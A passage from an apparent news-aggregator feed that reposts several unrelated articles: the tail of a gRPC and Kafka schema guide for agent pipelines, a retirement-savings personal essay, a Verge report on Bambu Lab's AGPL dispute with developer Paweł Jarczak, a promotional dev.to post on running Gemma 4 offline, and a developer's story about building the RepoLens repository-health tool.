  rpc StreamSteps (TaskRequest) returns (stream StepEvent);
  rpc Health (HealthRequest) returns (HealthResponse);
}

message TaskRequest {
  string task_id = 1;
  string session_id = 2;
  string prompt = 3;
  map<string, string> metadata = 4;
  int32 max_steps = 5;
  int32 token_budget = 6;
}

message TaskResponse {
  string task_id = 1;
  string status = 2;
  string output = 3;
  int32 steps_used = 4;
  int32 tokens_used = 5;
  string error = 6;
}

message StepEvent {
  int32 step_number = 1;
  string type = 2; // "llm_call" | "tool_call" | "tool_result"
  string content = 3;
}
```

#### Kafka Event Schema

For async pipeline handoffs between agents, use Avro or JSON schemas registered in a Schema Registry.

``` json
{
  "schema": {
    "type": "record",
    "name": "AgentTaskEvent",
    "namespace": "com.myco.agents.v1",
    "fields": [
      {"name": "task_id", "type": "string"},
      {"name": "source_agent", "type": "string"},
      {"name": "target_agent", "type": "string"},
      {"name": "session_id", "type": "string"},
      {"name": "prompt", "type": "string"},
      {"name": "context", "type": {"type": "map", "values": "string"}},
      {"name": "created_at", "type": {"type": "long", "logicalType": "timestamp-millis"}}
    ]
  }
}
```
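
As a rough illustration of how an orchestrator might build an event that fits this schema, here is a standard-library sketch. The helper names `make_task_event` and `validate_task_event` are hypothetical. A real pipeline would more likely rely on an Avro serializer tied to the Schema Registry than on hand-written checks like these.

```python
import time
import uuid

# Field names and Python equivalents of the Avro types in AgentTaskEvent.
AGENT_TASK_EVENT_FIELDS = {
    "task_id": str,
    "source_agent": str,
    "target_agent": str,
    "session_id": str,
    "prompt": str,
    "context": dict,    # Avro map with string values
    "created_at": int,  # timestamp-millis: milliseconds since the Unix epoch
}


def make_task_event(source_agent, target_agent, session_id, prompt, context=None):
    """Build an event dict with a fresh task_id and the current time."""
    return {
        "task_id": str(uuid.uuid4()),
        "source_agent": source_agent,
        "target_agent": target_agent,
        "session_id": session_id,
        "prompt": prompt,
        "context": dict(context or {}),
        "created_at": int(time.time() * 1000),
    }


def validate_task_event(event):
    """Return a list of problems; an empty list means the event fits the schema."""
    problems = []
    for name, expected in AGENT_TASK_EVENT_FIELDS.items():
        if name not in event:
            problems.append(f"missing field: {name}")
            continue
        value = event[name]
        # bool is a subclass of int in Python, so reject it explicitly.
        if isinstance(value, bool) or not isinstance(value, expected):
            problems.append(f"{name} must be {expected.__name__}")
        elif name == "context" and not all(
            isinstance(k, str) and isinstance(v, str) for k, v in value.items()
        ):
            problems.append("context keys and values must be strings")
    return problems
```

Validating before publishing keeps malformed events out of the topic, where they would otherwise only fail later inside a downstream agent.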

#### Kafka Producer (in Orchestrator)

``` python
# In orchestrator when dispatching to agent-search
from aiokafka import AIOKafkaProducer
```

---
## When I was done raising my kids, I spent my late 40s traveling. I forgot to save for retirement in the process.

> Published: 2026-05-24 04:24:01+00:00
> Source: https://www.businessinsider.com/forgot-to-plan-for-my-retirement-regret-2026-5
> wpnews: https://wpnews.pro/news/when-i-was-done-raising-my-kids-i-spent-my-late-40s-traveling-i-forgot-to-save

The article summarizes the author's realization at age 53 that her late-40s decision to prioritize travel over saving for retirement has left her financially unprepared. After raising four sons as a single mother, she became a travel writer and spent years on trips, accumulating air miles instead of retirement funds. Now, with her 26-year-old son's help, she is beginning to save, potentially retiring by age 75 if she manages her finances wisely.

It occurred to me at 3:32 one morning, the witching-est of hours, the worst possible time to wake up. I was jet-lagged after flying home from Norway. My suitcase was on the floor, waiting to be unpacked and repacked for my next trip in just two weeks.
I had $247 in my checking account. I didn't want to think about how much was in my savings account because it was probably less.
I am 53 years old, a mother of four adult children, a new-ish travel writer, and I am just now realizing that I have made my life a little ridiculous.
When I wake up the next morning, I'm easier on myself. I'm not ridiculous; even in the middle of the night, I know I'm not. But I think I took a wrong turn a few years back that felt like a right turn at the time.
Travel has always been in my blood
I always wanted to travel. Always. When I was raising my four sons as a single mom, I planned out pretend itineraries for myself online on Friday nights instead of socializing. Friends gave me their itineraries for tours of Egypt, for hiking trails through Portugal, and for a weekend in Paris. I followed along with my morning coffee, thinking, "one day."
I couldn't travel then, of course. I was in my 30s, raising my kids by myself. I was working cobbled-together jobs as a local baker, waitress, receptionist, anything at all to pay our bills. We survived together, and my sons grew up. They became their own people in their own lives.
Then it was my time to make some decisions about my life. I was young, just 46 years old, when my youngest turned 18. I could have gotten the education I missed out on when I became a young mom at 21. An education that might have led me to a job with a retirement plan and some security.
Instead, I wrote. I wrote for my local paper and online magazines. I wrote about motherhood. Then I finally traveled, small, cheap trips at first that I wrote about for my local paper, for online magazines. And eventually, travel, miraculously, impossibly, became one of my jobs.
It has been a dream job in many ways
Being a travel writer has been a dream in so many ways. Especially since it has given me the chance to travel with my adult kids in a way I might never have experienced otherwise.
My son and I went on a safari in South Africa after he got married. I took my daughter-in-law on our own little honeymoon to celebrate our new status together, a journey that sort of anchored us in a different way of bridging that in-law gap. I've flown solo to Morocco and Copenhagen, gone on a wellness retreat in Mexico, and stayed in a chateau in the south of France.
"Must be nice," is what I hear all the time. And it is.
I'm not sure what my future will bring
Every part of this life is incredible. Until I look at my bank account, barely fueled with small payments trickling in for articles I've written. Until I see my older face in the mirror and remember I will need to retire someday, and I've done nothing to prepare.
I've saved up air miles instead of money. I've prioritized experiences over security. I can't even think about the legacy I'm leaving for my sons. Boarding passes? Novelty tote bags? Branded water bottles from press trip swag bags?
I don't blame the travel writing for my bank account balance; I blame my all-or-nothing attitude. I know it's possible to do a little travel and still put money away for retirement. I know this because my 26-year-old son just sat me down with a spreadsheet to help me start saving.
According to his calculations, I might be able to retire by the time I'm 75 and still travel a bit if I'm smart about it. Finally, I might be ready to be smart about money. I'm tired of feeling ridiculous.

---
## 'Fuck you, Bambu': How one private message could change the face of 3D printing

> Published: 2026-05-24 04:22:39+00:00
> Source: https://www.theverge.com/tech/931532/bambu-agpl-pawel-jarczak-open-source-threat-dmca-github
> wpnews: https://wpnews.pro/news/fuck-you-bambu-how-one-private-message-could-change-the-face-of-3d-printing

Bambu Lab, a leading 3D printer manufacturer, is facing backlash after sending a private message to developer Paweł Jarczak asking him to remove code that allowed remote control of its printers without official software. The request has sparked outrage among open-source advocates and prominent tech figures, who are funding a legal defense and forking Bambu's code in protest. The controversy centers on whether Bambu is protecting its ecosystem or acting as a "bad actor" against the open-source community.

Bambu Lab makes the best, most accessible 3D printers yet, but that reputation is suddenly under siege. It all started when Paweł Jarczak received a private message from the company on Reddit asking him to delete his code. Now the 3D printing community is lining up behind Jarczak to fund a war against Bambu — and the future of 3D printers could be at stake.
‘Fuck you, Bambu’: How one private message could change the face of 3D printing
Bambu was set to become the Apple of 3D printers. Then it DM’d the wrong person.
Jarczak is a developer who shared a way to let people remote control their Bambu printers without using Bambu software. But Bambu wanted to lock down its system, despite relying on open-source code. That provoked a furious coalition of open-source advocates and YouTubers to respond.
“I’ll put up $10,000 to teach bambu labs a lesson,” declared consumer rights advocate Louis Rossmann, pledging to help defend Jarczak in court.
“I’m never buying a Bambu Lab 3D printer again,” stated maker Jeff Geerling, adding that he’d gladly chip in too. (He’s changed the YouTube title since.)
“Go fuck yourself, Bambu,” wrote GamersNexus, pledging to commit $10,000 as well. (It’s also halting previously unannounced plans to buy $150,000 of Bambu hardware for a 3D printing project, editor-in-chief Steve Burke tells The Verge.)
If that wasn’t enough, Rossmann, Burke, and thousands of other open-source advocates are daring Bambu to take legal action — they’re each forking the code Bambu was hoping to suppress. As of Monday, so is the Software Freedom Conservancy, which is now hosting an entire project to reverse engineer Bambu’s code and says it will serve as a Bambu watchdog.
“They’re bad actors, straight-up, and the community should do whatever we can,” Bradley Kühn, father of the AGPL open-source license and policy fellow at the Software Freedom Conservancy, tells The Verge.
But why is everyone so mad that Bambu’s printers don’t work perfectly with third-party apps? Are Bambu’s actions really that egregious, or is it just trying to protect its ecosystem? I spoke to Bambu, Jarczak, lawyers, and others to understand. Both Bambu and Jarczak shared copies of their private communications for this story with The Verge, each eager to set the record straight on what actually happened.
This is the story of how everything went wrong, and how it could become right again.
What is actually going on with Bambu and Paweł Jarczak?
On April 22nd, when Bambu first reached out to Jarczak in a Reddit private message, its tone seemed polite. Bambu suggested it was warning Jarczak of upcoming changes that could prevent his code from working. The first DM concludes: “we kindly ask you to consider removing the current connection approach, as it mimics official Bambu Lab software.”
Jarczak replied that he was ready to remove his entire project from GitHub and thanked the company for noticing his work. But he wanted to be “properly acknowledged” for possibly revealing “a significant security gap.” He offered further help for a fix while requesting some gear — specifically the flagship H2D printer.
But Bambu was not ready to reward or recognize him for promoting ways to use unauthorized third-party software and hardware that competes with its own. (Jarczak’s previous project was supporting a cheaper way to print in multiple colors than buying Bambu’s $279 AMS Lite, a project he’s since suggested Bambu should also recognize him for.)
Ominously, Bambu started talking to Jarczak like a mobster: “We wanted to speak with you first and handle this in a constructive way. That said, we can’t allow this approach to continue.”
Jarczak bristled. He had publicly voiced some suspicion that what he’d done had crossed a line. But he also knew that Bambu’s code was open-source under AGPL, a copyleft license so demanding that Google famously banned its engineers from using it at all.
The developer wanted to know: What, specifically, had he done wrong if the code was open-source?
Instead of explaining, Bambu ramped up its threat. It told Jarczak that a cease and desist letter had already been prepared, and “invited” him to look at section 1201 of the Digital Millennium Copyright Act, implying it could legally punish him for breaking digital locks.
But Bambu didn’t sue. It didn’t send a cease and desist letter. It didn’t even send a DMCA takedown to remove his files from GitHub. Jarczak voluntarily took his code down. But in that code’s place, Jarczak left a note suggesting that Bambu treated him like a criminal.
That’s when the internet pounced.
Why is the open-source 3D printing community so upset?
Because Bambu’s software is not just Bambu’s software. “Bambu Studio is based on PrusaSlicer by Prusa Research, which is from Slic3r by Alessandro Ranellucci and the RepRap community,” Bambu freely admits on its websites.
“Based on” doesn’t just mean Bambu took inspiration from those programs. Bambu Studio is similar to PrusaSlicer because it’s a fork of PrusaSlicer. It’s built atop the same code.
Every modern 3D printer uses a piece of software called a slicer, which “slices” 3D objects into layers, then turns those layers into instructions that a 3D printer can follow. Over time, they’ve become the way to remote control every other part of a 3D printer as well.
Almost every slicer is built atop the slicers that came before, going back nearly 15 years to when Alessandro Ranellucci first released Slic3r to the world under the AGPL license. That license guarantees no one has to reinvent the wheel so long as they contribute their own improvements. Bambu gets enormous value from this license, but it’s beginning to crack down on users enjoying the same benefits.
Bambu freely forked PrusaSlicer, and it doesn’t contest that anyone else can fork Bambu Studio as well. But Bambu cut off the ability for forks — including the most popular fork, OrcaSlicer — to send prints, remote control the print head, monitor the printer’s camera, change filament colors, and more, until or unless their developers integrated a new proprietary authentication mechanism. (The lead developer of OrcaSlicer declined.)
Jarczak had created his own fork of OrcaSlicer to work around Bambu’s proprietary requirement, and that’s the code Bambu wanted taken down.
Last January, Bambu said its motive was security. But many suspected a profit motive too: that Bambu might use its software to lock its printers to its own filament and accessories and start charging for subscription services, the way today’s inkjet printer companies do. Bambu did not deny those possibilities when we asked, and the open-source community has been preparing to fight possible enshittification ever since.
All Jarczak was originally trying to do was keep Bambu’s software from breaking compatibility with the Biqu BCMU third-party multicolor system (that undercuts Bambu’s own $279 accessory), after some users noticed the BCMU stopped working following a Bambu firmware update.
But when he built a copy of OrcaSlicer using code from the Linux version of Bambu Studio instead of the Windows or Mac versions, Bambu’s cloud services no longer stopped him from remote controlling his own printer at all. He’d inadvertently found a way to pick Bambu’s lock using Bambu’s own open-source code. When Bambu threatened him into submission for undoing its lock, he became an unwitting martyr for a bigger cause.
“People are trying to make me into some kind of hero here, but I am not that,” Jarczak tells The Verge.
Here’s where it gets really messy.
A lot of this will come down to how the open-source license used by Bambu is interpreted both by the public and potentially by courts. Bradley Kühn, who helped put the “A” into AGPL, says it’s a slam dunk: Bambu has violated its AGPL license.
In a blog post for the Software Freedom Conservancy, he identifies two specific violations. First, Bambu’s proprietary networking plug-in itself.
The actual text of the AGPL states that anyone who copies a program must license the source code for the entire program — including any “Corresponding Source” for other bits that are needed to generate, install, run, or modify the work.
It also has explicit examples of what should count as Corresponding Source, including “shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work.”
Guess what Bambu’s proprietary networking plug-in is made of? Shared libraries and dynamically linked libraries, ones that Bambu’s open-source portions automatically try to install when you first run the application, and ones that — Kühn and Jarczak both say — have intimate communication with Bambu’s open-source code.
Jarczak has now published a 30-point analysis at his GitHub page that runs down just how intimate that communication could be.
The second violation, Kühn writes, is how Bambu allegedly pressured Jarczak to remove his code from GitHub while falsely claiming its terms of service trump his rights under the AGPL license.
But neither Kühn nor Jarczak is a lawyer. Bambu has lawyers, and two lawyers who specialize in open-source tech tell The Verge that the AGPL is difficult to rely on.
What do Bambu and the lawyers say?
Bambu answered almost every question we sent over the course of a full week. Head of PR Nadia Yaakoubi told us that the company isn’t concerned about “open-source development or legitimate code forks.” (Bambu is implying Jarczak’s fork is illegitimate.)
The company argues that some of its code is “separately delivered” and therefore isn’t covered by the AGPLv3 license where “Corresponding Sources” are concerned. Here’s what it told us:
We do not agree that the networking plugin is properly characterized as part of Bambu Studio’s “Corresponding Source” for purposes of AGPLv3, such that AGPLv3 source-availability obligations would be triggered. It is a separately delivered, optional networking component that provides additional functionality. The fact that software may load a separate component at runtime does not establish that the component is part of the covered work or that it is source code; the work is “specifically designed to require” under Section 1, which defines the scope of “Corresponding Source.” And as you mentioned, AGPL also does not authorize any access violating the rules and protocols for communication across the network.
Kyle Mitchell, an independent tech lawyer who’s studied the AGPL, tells The Verge it’s quite possible that Bambu doesn’t need to share everything that touches its open-source code, particularly when we’re talking about cloud services.
“The AGPL, because of the problem it was written to solve, and because of the way it was written, doesn’t clearly say that if you change a program that you share to work with a web or cloud service, that you have to share all of that web and cloud service alike too,” he tells me over the phone.
Even with a plug-in, there is some degree of technical separation, he says — though Heather Meeker, a prominent open-source licensing expert and attorney, says a plug-in would at least “generally be part of Corresponding Source.”
Mitchell says Bambu’s statement to The Verge “goes right at the uncertainty,” the parts of the law that aren’t automatically clear and would have to be clarified by the courts — and for better or worse, the courts have not meaningfully weighed in on the text of the AGPL. “How broad the source code sharing requirement goes — there’s very little law to answer these questions,” Meeker confirms.
Says Mitchell: “There are no definitive answers to be found, just positions to take, which are just predictions about what courts would do.”
And — generally speaking — Meeker says not just anyone can meaningfully go after a 

---
## Why Open-Weight Models Like Gemma 4 Are the Future of Secure Backend Architecture

> Published: 2026-05-24 04:20:09+00:00
> Source: https://dev.to/ali_haroon_0111/why-open-weight-models-like-gemma-4-are-the-future-of-secure-backend-architecture-j87
> wpnews: https://wpnews.pro/news/why-open-weight-models-like-gemma-4-are-the-future-of-secure-backend

The article explains that Google's Gemma 4, a family of open-weight AI models released under the Apache 2.0 license, runs entirely offline on a user's own laptop without requiring a subscription or internet connection. This model is presented as a solution for developers in regions like Pakistan who face barriers such as high API costs and unreliable internet access, offering them permanent, free access to powerful AI that cannot be revoked or locked behind a paywall.

Why Open-Weight Models Like Gemma 4 Are the Future of Secure Backend Architecture
How Google's free, offline AI is breaking barriers for millions of developers — especially in Pakistan
The Problem Nobody Talks About
Imagine you are a talented developer in Lahore, Karachi, or a small town in rural Punjab. You have the skills. You have the ambition. You have ideas that could build the next great product.
But you face a wall that developers in San Francisco or London simply do not.
Your internet package ran out three days before your deadline. The cloud API bill arrived and it is more than your weekly grocery budget. The connection drops mid-session and you lose your entire conversation with the AI assistant😒. You simply cannot afford $20 per month for a ChatGPT subscription on top of everything else.
This is the daily reality for tens of millions of developers across South Asia, Africa, and the developing world. AI is supposed to be the great equalizer — the technology that lets a solo developer compete with a Silicon Valley team. But when AI lives behind a paywall or requires a fast, stable internet connection, it becomes yet another advantage for those who are already advantaged.
Until now.
What Is Gemma 4?
Gemma 4 is Google's latest family of open-weight AI models, released in April 2026. Think of it as a free, private, and highly capable AI assistant that lives entirely on your own laptop — no cloud, no subscription, no internet required.
Unlike ChatGPT or Google's own Gemini API — which process your data on remote servers and charge you per request — Gemma 4 is fundamentally different. Google has released the model weights under the Apache 2.0 open-source license, which means the core intelligence of the model is yours to download, run, modify, and even build products on top of, completely free.
It comes in four sizes designed for different hardware:
Every single one of them runs 100% offline.
Why Is Gemma 4 Completely Free?
This question deserves a real answer, because when something powerful is free, people assume there is a catch. With Gemma 4, the economics are genuinely different.
The business model of services like ChatGPT is straightforward: they run massive data centers full of expensive GPUs, process your messages on their servers, and charge you for that compute.
With Gemma 4, Google releases the model weights publicly and you run it on your own hardware. Google has no server costs for your usage, because you are the server. That is why they can offer it for free. The Apache 2.0 license also allows commercial use: you can build and sell products powered by Gemma 4 without paying royalties, provided you keep the license and attribution notices it requires.
What you need to run it:
Most laptops sold in the last four years meet these requirements. A mid-range Ryzen 5 machine — the kind you can find in Lahore's electronics markets — can run the E4B model comfortably.
Why Gemma 4 Will Remain Free😃
One of the biggest concerns developers have with modern AI platforms is long-term accessibility. Many popular AI systems initially attract users with free access but later move advanced capabilities behind expensive subscriptions or paid APIs.
However, Gemma 4 follows a fundamentally different philosophy.
Google released Gemma 4 under the permissive Apache 2.0 open-source license, which gives developers permanent legal rights to use, modify, and distribute the model. This license is irrevocable, meaning users who download the model can continue using it freely for both personal and commercial projects. Once the model exists on a user's device, it cannot suddenly be locked behind a paywall.
This creates a major difference between open-weight AI and closed cloud AI systems.
When developers use cloud-only AI platforms, the provider controls access, pricing, usage limits, and subscriptions.
But with Gemma 4, developers actually own the downloaded model files locally on their machine. Since the AI can run completely offline, Google has no technical control over how frequently users run the model or what projects they build with it.
This is especially important for students, startups, independent developers, educational institutions, and developers in countries with economic limitations.
A student in Pakistan can install Gemma 4 on a laptop and continue learning AI development without worrying about monthly subscriptions, API quotas, or increasing token costs.
Even commercial use is allowed. Developers can build applications, automate workflows, create AI tools, or launch startups using Gemma 4 without paying royalties or licensing fees.
Of course, Google still offers paid cloud infrastructure services for organizations that want managed hosting through platforms like Google Cloud Vertex AI. But the core Gemma 4 model itself remains free for anyone who chooses to run it locally.
This open model approach is one of the strongest reasons why Gemma 4 represents more than just another AI release — it represents a long-term shift toward accessible and developer-owned artificial intelligence.
A Game-Changer for Pakistan — and Every Developing Nation
Let us be specific. Let us talk about Pakistan.
Pakistan has over 300,000 IT graduates per year and a rapidly growing freelance economy. Pakistani developers are talented, creative, and hungry to build. But the AI tools that define modern development — tools that are becoming as essential as a code editor — have been largely out of reach for economic and infrastructure reasons.
Gemma 4 changes this in a profound way.
The Internet Problem
Pakistan's internet is improving, but it remains expensive relative to income. A 100 Mbps fiber connection might cost PKR 3,000–5,000 per month — a significant expense for a junior developer. Mobile data packages are even more restricted.
Cloud-based AI makes this worse. Every API call consumes bandwidth. A productive day of coding with an AI assistant can easily consume hundreds of megabytes of data. With capped packages, this is simply not sustainable.
Gemma 4 uses zero data after the initial download. Download the model once on a good connection — at a university, a cafe, or a friend's place. Then use it forever. On a plane. In a village with no cell signal. During load-shedding with a UPS. The AI keeps working.
The Cost Problem
The economics of commercial AI APIs are brutal for developers in lower-income countries. OpenAI's GPT-4o costs $5–15 per million tokens. At production scale, this can run into thousands of dollars per month. ChatGPT Plus costs $20/month just for personal use — nearly half a week's salary for many junior Pakistani developers.
With Gemma 4, the cost of running AI in your application is exactly zero beyond your electricity bill. A developer in Multan can build the same AI-powered product as a developer in Mountain View. The playing field, for the first time, is genuinely level.
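
To make that arithmetic concrete, here is a rough sketch using the $5 to $15 per million token range quoted above. The monthly token volume is an invented example, not a figure from any real product.

```python
def monthly_api_cost(tokens_per_month, usd_per_million_tokens):
    """Estimated monthly bill for a metered API at a flat per-token price."""
    return tokens_per_month / 1_000_000 * usd_per_million_tokens


# Hypothetical production volume: 200 million tokens per month.
tokens = 200_000_000
low = monthly_api_cost(tokens, 5)    # at $5 per million tokens
high = monthly_api_cost(tokens, 15)  # at $15 per million tokens
print(f"Estimated API bill: ${low:,.0f} to ${high:,.0f} per month")
```

At that assumed volume the metered bill lands in the low thousands of dollars per month, while the same workload on a local model costs only hardware and electricity.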
The Privacy Problem
When you send code or client data to a foreign cloud API, that data leaves your country. For Pakistani startups handling user information, this raises legitimate legal and ethical questions about data sovereignty.
With Gemma 4, your data never leaves your device. Your prompts, your code, your client information — none of it is ever transmitted anywhere. This is not just a privacy feature. It is a data sovereignty feature.
**What This Means for Developers: The Technical Benefits**
Beyond connectivity and cost, Gemma 4 offers technical capabilities that make it genuinely powerful for backend development.
Zero-Cost Backend AI Integration
The traditional architecture for an AI-powered backend: your server receives a request, calls the OpenAI or Gemini API, waits for a response, and returns it. You pay for every single call.
With Gemma 4, you host the model on your own server. Your server receives a request, calls the local Gemma 4 instance, and gets a response. The cost per call: nothing. For a Pakistani startup with limited runway, this can mean the difference between a viable product and one that burns through its budget before finding users.
Massive Context Window
The E2B and E4B models support a 128,000 token context window. The 26B and 31B models support 256,000 tokens. You can feed an entire codebase, a full documentation set, or a lengthy technical specification into a single conversation.
For Pakistani freelancers who are often handed large, undocumented legacy codebases by international clients, this is transformative. Drop the entire codebase into Gemma 4 and ask it to explain the architecture, identify issues, or suggest refactoring strategies.
Function Calling and Agent Capabilities
Gemma 4 supports native function calling — meaning it can output structured JSON to interact with your APIs, databases, or external services. You can build AI agents that actually do things rather than just talk about them. All of this runs locally, with no external calls and no costs.
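
As a sketch of what the backend side of function calling can look like, the snippet below parses a JSON tool call and dispatches it to a local Python function. The `{"name": ..., "arguments": ...}` shape and the `get_order_status` function are assumptions for illustration. The exact output format depends on the model and the runtime you use.

```python
import json


def get_order_status(order_id):
    # Hypothetical backend function; a real one would query a database.
    return {"order_id": order_id, "status": "shipped"}


# Only functions listed here can be triggered by model output.
TOOLS = {"get_order_status": get_order_status}


def dispatch_tool_call(model_output):
    """Parse the model's JSON tool call and run the matching local function."""
    call = json.loads(model_output)
    name = call["name"]
    if name not in TOOLS:
        raise ValueError(f"unknown tool: {name}")
    return TOOLS[name](**call.get("arguments", {}))


result = dispatch_tool_call(
    '{"name": "get_order_status", "arguments": {"order_id": "A17"}}'
)
```

The explicit `TOOLS` allowlist is a deliberate design choice: the model can only request functions you have registered, never arbitrary code.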
Thinking Mode for Hard Problems
Gemma 4 includes a Thinking Mode that forces the model to reason through a problem step by step before giving a final answer. Instead of getting a confident-but-wrong response, you get a transparent reasoning chain you can follow and critique. This is especially valuable for debugging complex issues or working through architectural decisions.
Multimodality: Vision and Audio
All Gemma 4 models support image input. The smaller models also support audio. Practical uses: screenshot a UI bug and ask Gemma 4 to identify the CSS causing it. Take a photo of a whiteboard architecture diagram and ask it to generate the corresponding code. Record a client meeting and have it extract the technical requirements.
Getting Gemma 4 running on your machine takes about ten minutes.
Option 1: Ollama (Best for Developers)
Ollama is a free, open-source tool that manages local AI models. Download it from ollama.com, then run this in your terminal:
`ollama run gemma4:e4b`
Ollama downloads the model and launches an interactive chat interface. Ollama also exposes a local REST API, so you can call Gemma 4 from your backend exactly like you would call the OpenAI API — but for free, on your own machine.
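
A minimal sketch of calling that local API from a Python backend, using only the standard library, might look like this. It assumes Ollama is running on its default port 11434 and uses the native `/api/generate` endpoint. The helper names are hypothetical, and the model tag is the one from the command above.

```python
import json
import urllib.request

OLLAMA_URL = "http://localhost:11434/api/generate"  # Ollama's default local address


def build_generate_request(prompt, model="gemma4:e4b"):
    """Build a non-streaming generate request for the local Ollama server."""
    payload = {"model": model, "prompt": prompt, "stream": False}
    return urllib.request.Request(
        OLLAMA_URL,
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def generate(prompt, model="gemma4:e4b", timeout=120):
    """Send the prompt to the local server and return the reply text."""
    request = build_generate_request(prompt, model)
    with urllib.request.urlopen(request, timeout=timeout) as resp:
        return json.loads(resp.read())["response"]
```

With the server running, `generate("Explain what a reverse proxy does")` would return the model's answer as a string, and no traffic leaves the machine.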
Option 2: LM Studio (Best for Beginners)
LM Studio provides a graphical interface — no terminal required. Download it from lmstudio.ai, search for Gemma 4, pick your model size, and start chatting. It also includes a local API server for backend integration.
Conclusion: The Democratization of AI
The history of technology has a recurring pattern. Powerful tools start as expensive, centralized services accessible only to well-funded companies in wealthy countries. Then they get open-sourced and distributed to everyone.
We are watching that pattern play out with AI right now.
Gemma 4 is not just a good model. It is a signal that the era of AI as a paid cloud utility — one that systematically excludes developers from lower-income countries — is coming to an end.
For a developer in Pakistan, running Gemma 4 means you can compete. You can build AI-powered products without a cloud budget. You can work without a reliable internet connection. You can keep your client's data private and secure. You can experiment freely without worrying about API bills.
Google did not just release a model. They released a piece of infrastructure — as fundamental and free as a web server — that every developer on earth can now build on.
That is a massive achievement, and it deserves to be celebrated🥳.
Try it today: download Ollama from ollama.com or LM Studio from lmstudio.ai, and run your first local AI model in under ten minutes.

---
## I lost 3 enterprise clients in one night because of a GitHub repo. So I built a tool to make sure it never happens again.

> Published: 2026-05-24 04:19:35+00:00
> Source: https://dev.to/apples_one_cd174284bffb/i-lost-3-enterprise-clients-in-one-night-because-of-a-github-repo-so-i-built-a-tool-to-make-sure-4fbc
> wpnews: https://wpnews.pro/news/i-lost-3-enterprise-clients-in-one-night-because-of-a-github-repo-so-i-built-a

The article describes how a developer lost three enterprise clients (worth $120,000 annually) after a single night of downtime caused by an unvetted GitHub library with a known security vulnerability and no recent maintenance. In response, the author built RepoLens, a tool that analyzes any GitHub repository in seconds and provides a health score, commit activity, language breakdown, and contributor data to help developers quickly assess a project's reliability.

It was 11:47 PM on a Tuesday.
I had just pushed to production.
Closed my laptop. Made tea. Felt good about myself.
By 3:14 AM my phone was a disaster.
17 missed calls. 43 Slack messages. 6 emails.
The subject line on the first email read:
"URGENT — Platform completely down"
My hands were shaking before I even opened it.
Three weeks earlier I had been under insane deadline pressure.
We were building a SaaS product for enterprise clients.
Launch was in 72 hours.
I needed an authentication library fast.
I went to GitHub.
Found one that looked incredible.
Clean name. Professional README.
2,400 stars. 340 forks.
The code looked solid on first glance.
I did what most developers do under deadline pressure.
I added it. Shipped it. Went to sleep.
What I didn't check:
The last commit was 9 months ago.
There were 47 open issues marked as critical.
Zero CI/CD pipeline.
Zero test files in the entire repo.
The maintainer had responded to exactly 0 issues in 6 months.
There was a known security vulnerability reported 4 months ago.
Still open. No response. No fix.
In 3 seconds I could have seen all of this.
I didn't check. So I didn't know.
Until 3am.
The bug triggered under high concurrent load.
Our enterprise demo that night had 200 simultaneous users.
The library collapsed. Took the auth system with it.
Every single user got logged out.
Sessions destroyed. Data in a corrupted state.
The whole platform returned a 500 error for 14 straight hours.
We lost 3 enterprise clients that week.
Each worth $40,000 annually.
$120,000 gone because I didn't spend 3 minutes
checking a GitHub repo properly.
My manager didn't fire me.
But the look on his face in that Monday meeting
is something I will never forget as long as I live.
After that I became obsessive.
I started checking every single dependency manually.
Every library. Every tool. Every npm package.
Every GitHub repo anyone on the team suggested.
I built a personal checklist:
→ When was the last commit?
→ Is there a CI/CD pipeline?
→ Are there test files?
→ How many open issues vs closed?
→ What is the average time to close an issue?
→ Who are the contributors and are they still active?
→ Is there a license?
→ How long and detailed is the README?
→ What does the community size look like?
→ Are there known CVEs in the dependencies?
20 to 30 minutes per repo.
Every single time.
My team thought I was paranoid.
I thought I was just finally doing my job properly.
Four months later I had evaluated hundreds of repos this way.
And I was completely burned out from doing it manually.
Every evaluation felt like the same work.
The same checks. The same tabs. The same mental process.
Over and over and over.
I started thinking about the developers who don't do this at all.
The ones who are exactly where I was at 11:47 PM on that Tuesday.
Feeling good. Laptop closed. Tea in hand.
Not knowing what's coming.
So I spent three weeks and built RepoLens.
Not for clout. Not for a portfolio piece.
Because I genuinely needed it.
And I was pretty sure millions of other developers did too.
Here is what it does:
Paste any GitHub URL.
In 3 seconds you get:
🏥 Repository Health Score — 0 to 100
A single score computed across 7 quality dimensions.
README quality. Commit activity. Test detection.
CI/CD presence. License. Community size. Issue resolution.
One number that tells you everything.
With a letter grade. A B C D.
So you know in 1 second if this is production-ready.
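To make the idea of a single score concrete, here is a small Python sketch of a weighted score over the seven dimensions listed above. The weights and grade cut-offs are invented for illustration and are not taken from RepoLens; only the dimension names and the A to D scale come from the description.

```python
# Hypothetical weights for the seven dimensions named above; they sum to 100.
WEIGHTS = {
    "readme": 15,
    "commit_activity": 20,
    "tests": 15,
    "ci_cd": 15,
    "license": 10,
    "community": 10,
    "issue_resolution": 15,
}

# Hypothetical grade cut-offs: minimum score needed for each letter.
GRADE_THRESHOLDS = [(80, "A"), (60, "B"), (40, "C")]


def health_score(signals: dict[str, float]) -> int:
    """Combine per-dimension signals (each in 0.0..1.0) into a 0..100 score."""
    total = 0.0
    for name, weight in WEIGHTS.items():
        # Clamp to the valid range; a missing dimension counts as 0.
        value = min(max(signals.get(name, 0.0), 0.0), 1.0)
        total += weight * value
    return round(total)


def letter_grade(score: int) -> str:
    """Map a 0..100 score to a letter using the assumed cut-offs."""
    for minimum, letter in GRADE_THRESHOLDS:
        if score >= minimum:
            return letter
    return "D"
```

Under these assumed weights, a repo with a good README and a license but no tests, no CI, and little recent activity lands in the D range, which is the kind of result described for the abandoned auth library.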
🥧 Language Breakdown
A beautiful interactive pie chart showing every single language
used in the codebase with exact percentages.
Know the full technical makeup before you touch it.
🔥 52-Week Commit Heatmap
A GitHub-style activity grid showing every week of the past year.
See at a glance — is this project alive or abandoned?
Spot burnout periods. Spot release sprints.
Spot the exact week the maintainer stopped caring.
👥 Top Contributor Graph
Who actually built this thing?
Are they still active?
Is it one person or a healthy team?
Bar chart. Avatars. Contribution share visualization.
Everything you need to know about who drives this project.
📦 Smart Dependency Detection
Automatically parses every ecosystem file:
package.json for Node.
requirements.txt and pyproject.toml for Python.
Cargo.toml for Rust.
go.mod for Go.
pom.xml for Java.
Gemfile for Ruby.
Every package. Every version. Automatically.
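A first step for this kind of detection could look like the sketch below, which only maps the manifest file names listed above to their ecosystems. How RepoLens actually parses each file is not shown in the article, so the function name and structure here are assumptions.

```python
from pathlib import PurePosixPath

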